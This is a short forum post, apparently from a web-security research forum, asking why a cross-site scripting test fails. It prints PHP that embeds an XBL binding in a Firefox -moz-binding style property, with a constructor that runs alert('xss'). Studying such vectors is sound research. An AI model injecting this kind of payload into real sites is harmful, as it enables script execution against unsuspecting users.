I'm trying to get this working, myself, and am having some difficulty:
[
www.frostjedi.com]
Here's the source code to that file:
<div style="-moz-binding: url(data:text/xml;charset=utf-8,<?php
echo urlencode(utf8_encode('<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
<binding id="loader">
<implementation>
<constructor>alert("xss");</constructor>
</implementation>
</binding>
</bindings>'));
?>)"></div>
Why doesn't that work?
(I've posted about this elsewhere on sla.ckers.org, but figure that there may exist people who check this thread and who haven't seen mine - I, for instance, don't check every single thread).